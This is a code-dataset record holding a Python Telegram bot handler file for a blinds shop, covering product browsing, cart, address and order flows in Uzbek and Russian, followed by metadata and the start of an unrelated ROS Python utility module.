o'tmaagansiz yoki Telefon nomeringizni tasdiqlamagansiz.\", language)\n\n\n\n\n# Functions\n\n\n\ndef products_text(category, current_page, user_id):\n    products = get_category_products(category_id=category.get('id'), page=int(current_page))\n    language = get_user_language(user_id)\n    \n    if products != False:\n        page_size = products.get(\"page_size\") \n        total = products.get(\"total\") \n        \n\n        if int(total) > int(page_size):\n            all_page = int(total) / int(page_size)\n            all_page = math.ceil(all_page)\n        else:\n            all_page = 1\n\n        text = f'{translate_text(\"Sahifa\", language)} {current_page}/{int(all_page)}\\n\\n'\n\n        for index, product in enumerate(products.get('results')):\n            name = product.get('name')\n            weight = product.get('weight')\n            price_sum = product.get('price_sum')\n            slug = product.get('slug')\n\n            text += f'{index + 1}. 
{name}-{weight} {price_sum} сум.\\nhttps://jalyuzi.com/product/{slug} \\n\\n'\n \n return text\n \n return False\n\n# Address\n\n@dp.message_handler(state=AddressStateGroup.city)\nasync def city_handler(message: types.Message, state=FSMContext):\n language = get_user_language(message.from_user.id)\n\n async with state.proxy() as data:\n data['city'] = message.text\n \n await AddressStateGroup.next()\n await send_message_local(message.from_user.id, \"Tumani kiriting: \", language)\n\n\n@dp.message_handler(state=AddressStateGroup.district)\nasync def district_handler(message: types.Message, state=FSMContext):\n language = get_user_language(message.from_user.id)\n\n async with state.proxy() as data:\n data['district'] = message.text\n\n await AddressStateGroup.next()\n\n\n await send_message_local(message.from_user.id, \"Mahala va Uyni kiriting: \", language)\n\n\n\n@dp.message_handler(state=AddressStateGroup.house)\nasync def house_handler(message: types.Message, state=FSMContext):\n language = get_user_language(message.from_user.id)\n\n async with state.proxy() as data:\n data['house'] = message.text\n\n data_obj = {\n \"city\": data['city'],\n \"state\": data['district'],\n \"address\": data['house'],\n }\n\n dt = create_address(message.from_user.id, json.dumps(data_obj))\n\n await state.finish()\n await send_message_local(message.from_user.id, \"Address muvaffaqiyatli kiritilindi.\", language)\n\n\n# Message handlers - \n\n\n\n@dp.message_handler(Text(equals=[\"🛍 Sotib olish\", \"🛍 Покупка\"], ignore_case=True))\nasync def to_shop(message: types.Message):\n language = get_user_language(message.from_user.id)\n\n\n await send_message_local(message.from_user.id, \"Kategoriyalar\", lang=language, reply_markup=category_keyboards(lang=language))\n\n\n@dp.message_handler(content_types=['location'])\nasync def get_location(message: types.Location):\n me = user_me(telegram_id=message.from_user.id)\n msg = f\"telegramId: {message.from_user.id}\\nИмя: {message.from_user.first_name}\\nUsername: @{message.from_user.username}\\nТип: Быстрый заказ\\nТел.номер:{me.get('phone_number')}\\nЛокация: {message.location.latitude}, {message.location.longitude}\"\n\n await bot.send_message(\"-1001875684284\", msg)\n\n\n await bot.send_message(message.from_user.id, \"Buyurtma qabul qilindi tez orada siz bilan bog'lanamiz\")\n\n\n@dp.message_handler(Text(equals=[\"🚀 Tezkor Buyurtma\", \"🚀 Быстрый заказ\"], ignore_case=True))\nasync def to_shop(message: types.Message):\n language = get_user_language(message.from_user.id)\n\n await send_message_local(message.from_user.id, \"Lokatsiyani yuboring\", lang=language, reply_markup=get_location_keyboards(lang=language))\n\n \n\n\n@dp.message_handler(Text(equals=[\"⬅️ Назад\", \"⬅️ Orqaga\"], ignore_case=True))\nasync def to_start(message: types.Message):\n await send_welcome(message)\n\n\n\n\n@dp.message_handler()\nasync def handle_message(message: types.Message, state=None):\n language = get_user_language(message.from_user.id)\n user = user_me(message.from_user.id)\n\n for category in get_categories():\n\n if message.text == category.get('name'):\n category_id = category.get(\"id\")\n\n per_page = len(get_category_products(category_id=category_id, page=1).get('results'))\n\n text = products_text(category=category, current_page=1, user_id=message.from_user.id)\n \n await bot.send_message(message.from_user.id, text=text, reply_markup=products_keyboard(per_page=per_page, category_id=category_id, current=1))\n\n if message.text == f\"Изменение имени({user.get('first_name')})\" 
or message.text == f\"Ismni o'zgartirish({user.get('first_name')})\":\n \n await UpdateUserState.first_name.set()\n await send_message_local(message.from_user.id, \"Yangi ism kiriting: \", language)\n\n elif message.text == f\"Смена фамилии({user.get('last_name')})\" or message.text == f\"Familiyani o'zgartirish({user.get('last_name')})\":\n await UpdateUserState.last_name.set()\n await send_message_local(message.from_user.id, \"Yangi familiya kiriting: \", language)\n\n\n\n\n\n@dp.message_handler(state=UpdateUserState.first_name)\nasync def first_name(message: types.Message, state=FSMContext):\n lang = get_user_language(message.from_user.id)\n user = user_me(message.from_user.id)\n\n async with state.proxy() as data:\n data['first_name'] = message.text\n data['last_name'] = \"message.text\"\n\n\n data = {\n \"first_name\": message.text,\n \"last_name\": str(user.get(\"last_name\"))\n }\n\n\n resp = update_user(message.from_user.id, json.dumps(data))\n resp = json.loads(resp.text)\n\n if resp.get(\"ok\"):\n await state.finish()\n\n await send_message_local(message.from_user.id, \"Ism o'zgardi\", lang)\n await send_welcome(message)\n\n else:\n await send_message_local(message.from_user.id, resp, lang)\n\n\n\n\n@dp.message_handler(state=UpdateUserState.last_name)\nasync def last_name(message: types.Message, state=FSMContext):\n lang = get_user_language(message.from_user.id)\n user = user_me(message.from_user.id)\n\n data = {\n \"first_name\": user.get(\"first_name\"),\n \"last_name\": message.text \n }\n\n\n resp = update_user(message.from_user.id, json.dumps(data))\n resp = json.loads(resp.text)\n\n if resp.get(\"ok\"):\n await state.finish()\n await send_message_local(message.from_user.id, \"Familiya o'zgardi\", lang)\n await send_welcome(message)\n\n else:\n await send_message_local(message.from_user.id, resp, lang)\n\n\n\n\n# Callback query - handler\n\n@dp.callback_query_handler()\nasync def change_message(callback: types.CallbackQuery, state=None):\n\n \n cat_id = str(callback.data)[9:]\n basket_id = str(callback.data)[7:]\n\n\n current = re.findall(r'\\d+', callback.data)\n\n if len(current) > 0:\n current = current[-1]\n\n\n # Buy products\n\n if callback.data == \"basket_reset\":\n drop_all_cart(callback.from_user.id)\n language = get_user_language(callback.from_user.id)\n\n await send_message_local(callback.from_user.id, \"Korzinka tozalandi.\", language)\n\n \n\n elif callback.data == \"basket_buy\":\n \n products = get_cart_products(callback.from_user.id)\n text = \"\"\n overall_price = 0\n order_products = []\n \n address = get_address(callback.from_user.id)\n lang = get_user_language(callback.from_user.id)\n \n\n if address:\n len_of_product = len(products)\n\n for index, product in enumerate(products):\n square = product[1]\n product = json.loads(product[0])\n\n\n name = product.get(\"name\")\n product_id = product.get(\"id\")\n price = product.get(\"price_sum\")\n slug = product.get(\"slug\")\n blackout = product.get(\"blackout\")\n square_ = re.findall(r\"[-+]?(?:\\d*\\.*\\d+)\", square)\n w = float(square_[0])\n h = float(square_[1])\n \n\n all_square = w * h\n all_price = float(price) * all_square\n\n overall_price = overall_price + all_price\n\n\n order_products.append({\n \"product\": product_id,\n \"product_price\": price,\n \"overall_price\": int(overall_price),\n \"size\": square,\n \"type_id\": \"None\",\n \"status\": \"pending\",\n \"address\": address[0].get(\"id\"),\n \"amount\": 1\n })\n\n\n data = create_order(telegram_id=callback.from_user.id, 
data=json.dumps(order_products))\n drop_all_cart(callback.from_user.id)\n if len_of_product >= 1:\n\n await bot.send_message(callback.from_user.id, translate_text(f\"Sizning buyurtmangiz qabul qilindi.\\nTez orada administratorlar siz bilan bo'glanishadi \", lang))\n\n else:\n await bot.send_message(callback.from_user.id, translate_text(f\"Siz address kiritmagan ekansiz!\", lang) + \"\\n/address\")\n\n\n # Basket handler \n\n elif str(callback.data) == f\"basket_{basket_id}\":\n language = get_user_language(callback.from_user.id)\n\n products = get_cart_products(callback.from_user.id)\n product = json.loads(products[int(basket_id) - 1][0])\n product_id = product.get(\"id\")\n product_name = product.get(\"name\")\n\n await ProductEditState.square.set()\n\n\n async with state.proxy() as data:\n data['product_id'] = product_id\n\n await bot.send_message(callback.from_user.id, translate_text(f\"{product_name} Tovarning kengligini va balandligini metr o'lcho'vida yuboring.\\nShunaqangi tartibda yuboring:\\n\", language) + \"2x3\")\n\n # Next and back handler\n\n for index, category in enumerate(get_categories()):\n category_id = category.get(\"id\")\n\n\n if callback.data == f\"next_{category.get('id')}_{current}\":\n \n category_id = category.get(\"id\")\n\n next_i = int(current) + 1\n current = str(next_i)\n \n category_products = get_category_products(category_id=category_id, page=next_i) \n\n if category_products != False:\n await bot.delete_message(callback.from_user.id, callback.message.message_id)\n per_page = len(category_products.get('results'))\n else:\n per_page = 1\n\n text = products_text(category=category, current_page=str(next_i), user_id=callback.from_user.id)\n\n if text != False:\n return await bot.send_message(callback.from_user.id, text=text, reply_markup=products_keyboard(per_page=per_page, category_id=category_id, current=str(next_i)))\n return await callback.answer(\"Not found\")\n\n elif callback.data == f\"back_{category.get('id')}_{current}\":\n if int(current) > 1:\n category_id = category.get(\"id\")\n back_i = int(current) - 1\n current = str(back_i)\n \n category_products = get_category_products(category_id=category_id, page=back_i)\n\n if category_products != False:\n await bot.delete_message(callback.from_user.id, callback.message.message_id)\n per_page = len(category_products.get('results'))\n else:\n per_page = 1\n \n text = products_text(category=category, current_page=str(back_i), user_id=callback.from_user.id)\n\n if text != False:\n return await bot.send_message(callback.from_user.id, text=text, reply_markup=products_keyboard(per_page=per_page, category_id=category_id, current=str(back_i)))\n \n return await callback.answer(\"Not found\")\n\n # Get product handler\n\n for let in range(1, 13):\n page_current = callback.data[7:8]\n\n if str(callback.data) == f\"page_{let}_{page_current}_{cat_id}\":\n\n \n language = get_user_language(callback.from_user.id)\n\n product = get_product_from_list(category_id=cat_id, page=page_current, index=let)\n photo_product = baseUrl + product.get(\"image\")\n # photo_product = \"http://www.jalyuzi.uz/image/cache/catalog/photos/item/tkanVer/diamond-03212-228x228.jpg\"\n name = product.get(\"name\")\n weight = product.get(\"weight\")\n color_id = product.get(\"color\")\n\n if len(color_id) >= 1:\n color_id = product.get(\"color\")[0]\n color = get_color(color_id).get(\"name\")\n else:\n color = \"Нет\"\n \n open_site = translate_text(\"Saytda ko'rish\", language)\n product_slug = product.get(\"slug\")\n\n url = f'{open_site} 🌐' 
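\n            # Build a localized caption for the product card: every label below is\n            # passed through translate_text so the text matches the user's saved language.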
\n category_name = get_category(cat_id).get(\"name\")\n price = product.get(\"price_sum\")\n\n text = f\"{translate_text('Tovar nomi', language)}: {name},\\n{translate_text('Lenta kengligi', language)}: {weight},\\n{translate_text('Kategoriya', language)}: {category_name},\\n{translate_text('Rang', language)}: {color}\\n{translate_text('narxi', language)}: {price} сум\\n\\n{url}\" \n\n\n await bot.send_photo(chat_id=callback.from_user.id, photo=str(photo_product), caption=text, reply_markup=add_cart_keyboards(lang=language, product_slug=product_slug))\n\n # Add to cart handler\n\n if str(callback.data)[:7] == 'product':\n language = get_user_language(callback.from_user.id)\n\n slug = str(callback.data)[8:]\n product = get_product(slug)\n\n if product is not None:\n if is_authenticated(callback.from_user.id):\n status = add_to_cart(callback.from_user.id, json.dumps(product))\n \n if status:\n return await bot.send_message(callback.from_user.id, str(translate_text(\"Mahsulot savatga muvaffaqiyatli qo‘shildi\", language)) + ' ✅\\n/basket')\n else:\n msg = await bot.send_message(callback.from_user.id, str(translate_text(\"Mahsulot korzinkaga qoshilib bo'lingan\", language)) + ' ❌\\n/basket')\n time.sleep(2)\n await bot.delete_message(callback.from_user.id, msg.message_id)\n\n# State \n\n@dp.message_handler(state=ProductEditState.square)\nasync def square_handle(message:types.Message, state=FSMContext):\n first_letter = str(message.text)[:1]\n last_letter = str(message.text)[-1]\n language = get_user_language(message.from_user.id)\n\n if first_letter.isdigit() and last_letter.isdigit():\n async with state.proxy() as data:\n data['square'] = message.text\n product_id = data['product_id']\n\n update_cart(message.from_user.id, product_id, message.text)\n await state.finish()\n return await bot.send_message(message.from_user.id, translate_text(\"Ummumiy kv muvafiqiyatli o'zgardi ✅\", language) + '\\n/basket')\n\n \n else:\n return await send_message_local(message.from_user.id, \"Iltimos tepada misol qilib keltirilgandaka kiritin!\", language)\n\n\n", "repo_name": "Abdulvoris101/Jalyuzi-bot", "sub_path": "core/handlers.py", "file_name": "handlers.py", "file_ext": "py", "file_size_in_byte": 19640, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "run.types.Message", "line_number": 17, "usage_type": "attribute"}, {"api_name": "run.types", "line_number": 17, "usage_type": "name"}, {"api_name": "db.manager.get_user_language", "line_number": 18, "usage_type": "call"}, {"api_name": "fetch.user_me", "line_number": 19, "usage_type": "call"}, {"api_name": "db.manager.is_authenticated", "line_number": 22, "usage_type": "call"}, {"api_name": "utils.send_message_local", "line_number": 23, "usage_type": "call"}, {"api_name": "keyboards.start_keyboards", "line_number": 23, "usage_type": "call"}, {"api_name": "run.ClientStateGroup.language.set", "line_number": 30, "usage_type": "call"}, {"api_name": "run.ClientStateGroup.language", "line_number": 30, "usage_type": "attribute"}, {"api_name": "run.ClientStateGroup", "line_number": 30, "usage_type": "name"}, {"api_name": "run.bot.send_message", "line_number": 32, "usage_type": "call"}, {"api_name": "run.bot", "line_number": 32, "usage_type": "name"}, {"api_name": "run.bot.send_message", "line_number": 36, "usage_type": "call"}, {"api_name": "run.bot", "line_number": 36, "usage_type": "name"}, {"api_name": "keyboards.language_keyboards", "line_number": 38, "usage_type": "name"}, 
{"api_name": "run.dp.message_handler", "line_number": 16, "usage_type": "call"}, {"api_name": "run.dp", "line_number": 16, "usage_type": "name"}, {"api_name": "run.types.Message", "line_number": 44, "usage_type": "attribute"}, {"api_name": "run.types", "line_number": 44, "usage_type": "name"}, {"api_name": "db.manager.get_cart_products", "line_number": 45, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 51, "usage_type": "call"}, {"api_name": "db.manager.get_user_language", "line_number": 52, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 61, "usage_type": "call"}, {"api_name": "fetch.baseUrl", "line_number": 71, "usage_type": "name"}, {"api_name": "run.bot.send_message", "line_number": 83, "usage_type": "call"}, {"api_name": "run.bot", "line_number": 83, "usage_type": "name"}, {"api_name": "keyboards.basket_keyboard", "line_number": 83, "usage_type": "call"}, {"api_name": "run.dp.message_handler", "line_number": 43, "usage_type": "call"}, {"api_name": "run.dp", "line_number": 43, "usage_type": "name"}, {"api_name": "run.types.Message", "line_number": 88, "usage_type": "attribute"}, {"api_name": "run.types", "line_number": 88, "usage_type": "name"}, {"api_name": "db.manager.is_authenticated", "line_number": 89, "usage_type": "call"}, {"api_name": "db.manager.get_user_language", "line_number": 90, "usage_type": "call"}, {"api_name": "fetch.get_address", "line_number": 91, "usage_type": "call"}, {"api_name": "run.AddressStateGroup.city.set", "line_number": 94, "usage_type": "call"}, {"api_name": "run.AddressStateGroup.city", "line_number": 94, "usage_type": "attribute"}, {"api_name": "run.AddressStateGroup", "line_number": 94, "usage_type": "name"}, {"api_name": "utils.send_message_local", "line_number": 95, "usage_type": "call"}, {"api_name": "utils.send_message_local", "line_number": 97, "usage_type": "call"}, {"api_name": "utils.send_message_local", "line_number": 99, "usage_type": "call"}, {"api_name": "run.dp.message_handler", "line_number": 87, "usage_type": "call"}, {"api_name": "run.dp", "line_number": 87, "usage_type": "name"}, {"api_name": "fetch.get_category_products", "line_number": 109, "usage_type": "call"}, {"api_name": "db.manager.get_user_language", "line_number": 110, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 119, "usage_type": "call"}, {"api_name": "utils.translate_text", "line_number": 123, "usage_type": "call"}, {"api_name": "run.types.Message", "line_number": 140, "usage_type": "attribute"}, {"api_name": "run.types", "line_number": 140, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.storage.FSMContext", "line_number": 140, "usage_type": "name"}, {"api_name": "db.manager.get_user_language", "line_number": 141, "usage_type": "call"}, {"api_name": "run.AddressStateGroup.next", "line_number": 146, "usage_type": "call"}, {"api_name": "run.AddressStateGroup", "line_number": 146, "usage_type": "name"}, {"api_name": "utils.send_message_local", "line_number": 147, "usage_type": "call"}, {"api_name": "run.dp.message_handler", "line_number": 139, "usage_type": "call"}, {"api_name": "run.dp", "line_number": 139, "usage_type": "name"}, {"api_name": "run.AddressStateGroup.city", "line_number": 139, "usage_type": "attribute"}, {"api_name": "run.AddressStateGroup", "line_number": 139, "usage_type": "name"}, {"api_name": "run.types.Message", "line_number": 151, "usage_type": "attribute"}, {"api_name": "run.types", "line_number": 151, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.storage.FSMContext", 
"line_number": 151, "usage_type": "name"}, {"api_name": "db.manager.get_user_language", "line_number": 152, "usage_type": "call"}, {"api_name": "run.AddressStateGroup.next", "line_number": 157, "usage_type": "call"}, {"api_name": "run.AddressStateGroup", "line_number": 157, "usage_type": "name"}, {"api_name": "utils.send_message_local", "line_number": 160, "usage_type": "call"}, {"api_name": "run.dp.message_handler", "line_number": 150, "usage_type": "call"}, {"api_name": "run.dp", "line_number": 150, "usage_type": "name"}, {"api_name": "run.AddressStateGroup.district", "line_number": 150, "usage_type": "attribute"}, {"api_name": "run.AddressStateGroup", "line_number": 150, "usage_type": "name"}, {"api_name": "run.types.Message", "line_number": 165, "usage_type": "attribute"}, {"api_name": "run.types", "line_number": 165, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.storage.FSMContext", "line_number": 165, "usage_type": "name"}, {"api_name": "db.manager.get_user_language", "line_number": 166, "usage_type": "call"}, {"api_name": "fetch.create_address", "line_number": 177, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 177, "usage_type": "call"}, {"api_name": "utils.send_message_local", "line_number": 180, "usage_type": "call"}, {"api_name": "run.dp.message_handler", "line_number": 164, "usage_type": "call"}, {"api_name": "run.dp", "line_number": 164, "usage_type": "name"}, {"api_name": "run.AddressStateGroup.house", "line_number": 164, "usage_type": "attribute"}, {"api_name": "run.AddressStateGroup", "line_number": 164, "usage_type": "name"}, {"api_name": "run.types.Message", "line_number": 188, "usage_type": "attribute"}, {"api_name": "run.types", "line_number": 188, "usage_type": "name"}, {"api_name": "db.manager.get_user_language", "line_number": 189, "usage_type": "call"}, {"api_name": "utils.send_message_local", "line_number": 192, "usage_type": "call"}, {"api_name": "keyboards.category_keyboards", "line_number": 192, "usage_type": "call"}, {"api_name": "run.dp.message_handler", "line_number": 187, "usage_type": "call"}, {"api_name": "run.dp", "line_number": 187, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.filters.Text", "line_number": 187, "usage_type": "call"}, {"api_name": "run.types.Location", "line_number": 196, "usage_type": "attribute"}, {"api_name": "run.types", "line_number": 196, "usage_type": "name"}, {"api_name": "fetch.user_me", "line_number": 197, "usage_type": "call"}, {"api_name": "run.bot.send_message", "line_number": 200, "usage_type": "call"}, {"api_name": "run.bot", "line_number": 200, "usage_type": "name"}, {"api_name": "run.bot.send_message", "line_number": 203, "usage_type": "call"}, {"api_name": "run.bot", "line_number": 203, "usage_type": "name"}, {"api_name": "run.dp.message_handler", "line_number": 195, "usage_type": "call"}, {"api_name": "run.dp", "line_number": 195, "usage_type": "name"}, {"api_name": "run.types.Message", "line_number": 207, "usage_type": "attribute"}, {"api_name": "run.types", "line_number": 207, "usage_type": "name"}, {"api_name": "db.manager.get_user_language", "line_number": 208, "usage_type": "call"}, {"api_name": "utils.send_message_local", "line_number": 210, "usage_type": "call"}, {"api_name": "keyboards.get_location_keyboards", "line_number": 210, "usage_type": "call"}, {"api_name": "run.dp.message_handler", "line_number": 206, "usage_type": "call"}, {"api_name": "run.dp", "line_number": 206, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.filters.Text", "line_number": 206, 
"usage_type": "call"}, {"api_name": "run.types.Message", "line_number": 216, "usage_type": "attribute"}, {"api_name": "run.types", "line_number": 216, "usage_type": "name"}, {"api_name": "run.dp.message_handler", "line_number": 215, "usage_type": "call"}, {"api_name": "run.dp", "line_number": 215, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.filters.Text", "line_number": 215, "usage_type": "call"}, {"api_name": "run.types.Message", "line_number": 223, "usage_type": "attribute"}, {"api_name": "run.types", "line_number": 223, "usage_type": "name"}, {"api_name": "db.manager.get_user_language", "line_number": 224, "usage_type": "call"}, {"api_name": "fetch.user_me", "line_number": 225, "usage_type": "call"}, {"api_name": "fetch.get_categories", "line_number": 227, "usage_type": "call"}, {"api_name": "fetch.get_category_products", "line_number": 232, "usage_type": "call"}, {"api_name": "run.bot.send_message", "line_number": 236, "usage_type": "call"}, {"api_name": "run.bot", "line_number": 236, "usage_type": "name"}, {"api_name": "keyboards.products_keyboard", "line_number": 236, "usage_type": "call"}, {"api_name": "run.UpdateUserState.first_name.set", "line_number": 240, "usage_type": "call"}, {"api_name": "run.UpdateUserState.first_name", "line_number": 240, "usage_type": "attribute"}, {"api_name": "run.UpdateUserState", "line_number": 240, "usage_type": "name"}, {"api_name": "utils.send_message_local", "line_number": 241, "usage_type": "call"}, {"api_name": "run.UpdateUserState.last_name.set", "line_number": 244, "usage_type": "call"}, {"api_name": "run.UpdateUserState.last_name", "line_number": 244, "usage_type": "attribute"}, {"api_name": "run.UpdateUserState", "line_number": 244, "usage_type": "name"}, {"api_name": "utils.send_message_local", "line_number": 245, "usage_type": "call"}, {"api_name": "run.dp.message_handler", "line_number": 222, "usage_type": "call"}, {"api_name": "run.dp", "line_number": 222, "usage_type": "name"}, {"api_name": "run.types.Message", "line_number": 252, "usage_type": "attribute"}, {"api_name": "run.types", "line_number": 252, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.storage.FSMContext", "line_number": 252, "usage_type": "name"}, {"api_name": "db.manager.get_user_language", "line_number": 253, "usage_type": "call"}, {"api_name": "fetch.user_me", "line_number": 254, "usage_type": "call"}, {"api_name": "fetch.update_user", "line_number": 267, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 267, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 268, "usage_type": "call"}, {"api_name": "utils.send_message_local", "line_number": 273, "usage_type": "call"}, {"api_name": "utils.send_message_local", "line_number": 277, "usage_type": "call"}, {"api_name": "run.dp.message_handler", "line_number": 251, "usage_type": "call"}, {"api_name": "run.dp", "line_number": 251, "usage_type": "name"}, {"api_name": "run.UpdateUserState.first_name", "line_number": 251, "usage_type": "attribute"}, {"api_name": "run.UpdateUserState", "line_number": 251, "usage_type": "name"}, {"api_name": "run.types.Message", "line_number": 283, "usage_type": "attribute"}, {"api_name": "run.types", "line_number": 283, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.storage.FSMContext", "line_number": 283, "usage_type": "name"}, {"api_name": "db.manager.get_user_language", "line_number": 284, "usage_type": "call"}, {"api_name": "fetch.user_me", "line_number": 285, "usage_type": "call"}, {"api_name": "fetch.update_user", "line_number": 293, 
"usage_type": "call"}, {"api_name": "json.dumps", "line_number": 293, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 294, "usage_type": "call"}, {"api_name": "utils.send_message_local", "line_number": 298, "usage_type": "call"}, {"api_name": "utils.send_message_local", "line_number": 302, "usage_type": "call"}, {"api_name": "run.dp.message_handler", "line_number": 282, "usage_type": "call"}, {"api_name": "run.dp", "line_number": 282, "usage_type": "name"}, {"api_name": "run.UpdateUserState.last_name", "line_number": 282, "usage_type": "attribute"}, {"api_name": "run.UpdateUserState", "line_number": 282, "usage_type": "name"}, {"api_name": "run.types.CallbackQuery", "line_number": 310, "usage_type": "attribute"}, {"api_name": "run.types", "line_number": 310, "usage_type": "name"}, {"api_name": "re.findall", "line_number": 317, "usage_type": "call"}, {"api_name": "db.manager.drop_all_cart", "line_number": 326, "usage_type": "call"}, {"api_name": "db.manager.get_user_language", "line_number": 327, "usage_type": "call"}, {"api_name": "utils.send_message_local", "line_number": 329, "usage_type": "call"}, {"api_name": "db.manager.get_cart_products", "line_number": 335, "usage_type": "call"}, {"api_name": "fetch.get_address", "line_number": 340, "usage_type": "call"}, {"api_name": "db.manager.get_user_language", "line_number": 341, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 349, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 357, "usage_type": "call"}, {"api_name": "fetch.create_order", "line_number": 380, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 380, "usage_type": "call"}, {"api_name": "db.manager.drop_all_cart", "line_number": 381, "usage_type": "call"}, {"api_name": "run.bot.send_message", "line_number": 384, "usage_type": "call"}, {"api_name": "run.bot", "line_number": 384, "usage_type": "name"}, {"api_name": "utils.translate_text", "line_number": 384, "usage_type": "call"}, {"api_name": "run.bot.send_message", "line_number": 387, "usage_type": "call"}, {"api_name": "run.bot", "line_number": 387, "usage_type": "name"}, {"api_name": "utils.translate_text", "line_number": 387, "usage_type": "call"}, {"api_name": "db.manager.get_user_language", "line_number": 393, "usage_type": "call"}, {"api_name": "db.manager.get_cart_products", "line_number": 395, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 396, "usage_type": "call"}, {"api_name": "run.ProductEditState.square.set", "line_number": 400, "usage_type": "call"}, {"api_name": "run.ProductEditState.square", "line_number": 400, "usage_type": "attribute"}, {"api_name": "run.ProductEditState", "line_number": 400, "usage_type": "name"}, {"api_name": "run.bot.send_message", "line_number": 406, "usage_type": "call"}, {"api_name": "run.bot", "line_number": 406, "usage_type": "name"}, {"api_name": "utils.translate_text", "line_number": 406, "usage_type": "call"}, {"api_name": "fetch.get_categories", "line_number": 410, "usage_type": "call"}, {"api_name": "fetch.get_category_products", "line_number": 421, "usage_type": "call"}, {"api_name": "run.bot.delete_message", "line_number": 424, "usage_type": "call"}, {"api_name": "run.bot", "line_number": 424, "usage_type": "name"}, {"api_name": "run.bot.send_message", "line_number": 432, "usage_type": "call"}, {"api_name": "run.bot", "line_number": 432, "usage_type": "name"}, {"api_name": "keyboards.products_keyboard", "line_number": 432, "usage_type": "call"}, {"api_name": "fetch.get_category_products", 
"line_number": 441, "usage_type": "call"}, {"api_name": "run.bot.delete_message", "line_number": 444, "usage_type": "call"}, {"api_name": "run.bot", "line_number": 444, "usage_type": "name"}, {"api_name": "run.bot.send_message", "line_number": 452, "usage_type": "call"}, {"api_name": "run.bot", "line_number": 452, "usage_type": "name"}, {"api_name": "keyboards.products_keyboard", "line_number": 452, "usage_type": "call"}, {"api_name": "db.manager.get_user_language", "line_number": 464, "usage_type": "call"}, {"api_name": "fetch.get_product_from_list", "line_number": 466, "usage_type": "call"}, {"api_name": "fetch.baseUrl", "line_number": 467, "usage_type": "name"}, {"api_name": "fetch.get_color", "line_number": 475, "usage_type": "call"}, {"api_name": "utils.translate_text", "line_number": 479, "usage_type": "call"}, {"api_name": "fetch.baseUrl", "line_number": 482, "usage_type": "name"}, {"api_name": "fetch.get_category", "line_number": 483, "usage_type": "call"}, {"api_name": "utils.translate_text", "line_number": 486, "usage_type": "call"}, {"api_name": "run.bot.send_photo", "line_number": 489, "usage_type": "call"}, {"api_name": "run.bot", "line_number": 489, "usage_type": "name"}, {"api_name": "keyboards.add_cart_keyboards", "line_number": 489, "usage_type": "call"}, {"api_name": "db.manager.get_user_language", "line_number": 494, "usage_type": "call"}, {"api_name": "fetch.get_product", "line_number": 497, "usage_type": "call"}, {"api_name": "db.manager.is_authenticated", "line_number": 500, "usage_type": "call"}, {"api_name": "db.manager.add_to_cart", "line_number": 501, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 501, "usage_type": "call"}, {"api_name": "run.bot.send_message", "line_number": 504, "usage_type": "call"}, {"api_name": "run.bot", "line_number": 504, "usage_type": "name"}, {"api_name": "utils.translate_text", "line_number": 504, "usage_type": "call"}, {"api_name": "run.bot.send_message", "line_number": 506, "usage_type": "call"}, {"api_name": "run.bot", "line_number": 506, "usage_type": "name"}, {"api_name": "utils.translate_text", "line_number": 506, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 507, "usage_type": "call"}, {"api_name": "run.bot.delete_message", "line_number": 508, "usage_type": "call"}, {"api_name": "run.bot", "line_number": 508, "usage_type": "name"}, {"api_name": "run.dp.callback_query_handler", "line_number": 309, "usage_type": "call"}, {"api_name": "run.dp", "line_number": 309, "usage_type": "name"}, {"api_name": "run.types.Message", "line_number": 513, "usage_type": "attribute"}, {"api_name": "run.types", "line_number": 513, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.storage.FSMContext", "line_number": 513, "usage_type": "name"}, {"api_name": "db.manager.get_user_language", "line_number": 516, "usage_type": "call"}, {"api_name": "db.manager.update_cart", "line_number": 523, "usage_type": "call"}, {"api_name": "run.bot.send_message", "line_number": 525, "usage_type": "call"}, {"api_name": "run.bot", "line_number": 525, "usage_type": "name"}, {"api_name": "utils.translate_text", "line_number": 525, "usage_type": "call"}, {"api_name": "utils.send_message_local", "line_number": 529, "usage_type": "call"}, {"api_name": "run.dp.message_handler", "line_number": 512, "usage_type": "call"}, {"api_name": "run.dp", "line_number": 512, "usage_type": "name"}, {"api_name": "run.ProductEditState.square", "line_number": 512, "usage_type": "attribute"}, {"api_name": "run.ProductEditState", "line_number": 512, 
"usage_type": "name"}]} +{"seq_id": "22830814074", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nThis module is used for utility and helper functions.\n\nClasses:\n Vector2: 2D vector class representation with x and y components\n MarkerSet: convenience class for handling interactive Rviz markers\n\nFunction:\n pose_dist: calculate distance between two ROS Pose type variables\n\"\"\"\n\nimport math\nimport rospy\nimport logging\nimport numpy as np\nfrom visualization_msgs.msg import Marker, MarkerArray\nfrom std_msgs.msg import ColorRGBA\nfrom geometry_msgs.msg import Pose, Vector3, Quaternion\nfrom tf.transformations import quaternion_from_euler\n\n\nclass Vector2(object):\n \"\"\"\n 2D vector class representation with x and y components.\n\n Supports simple addition, subtraction, multiplication, division and\n normalization, as well as getting norm and angle of the vector and\n setting limit and magnitude.\n\n Attributes:\n x (float): x component of the vector\n y (float): y component of the vector\n\n Methods:\n norm(self): Return the norm of the vector\n arg(self): Return the angle of the vector\n normalize(self): Normalize the vector\n limit(self, value): Limit vector's maximum magnitude to given value\n set_mag(self, value): Set vector's magnitude without changing direction\n 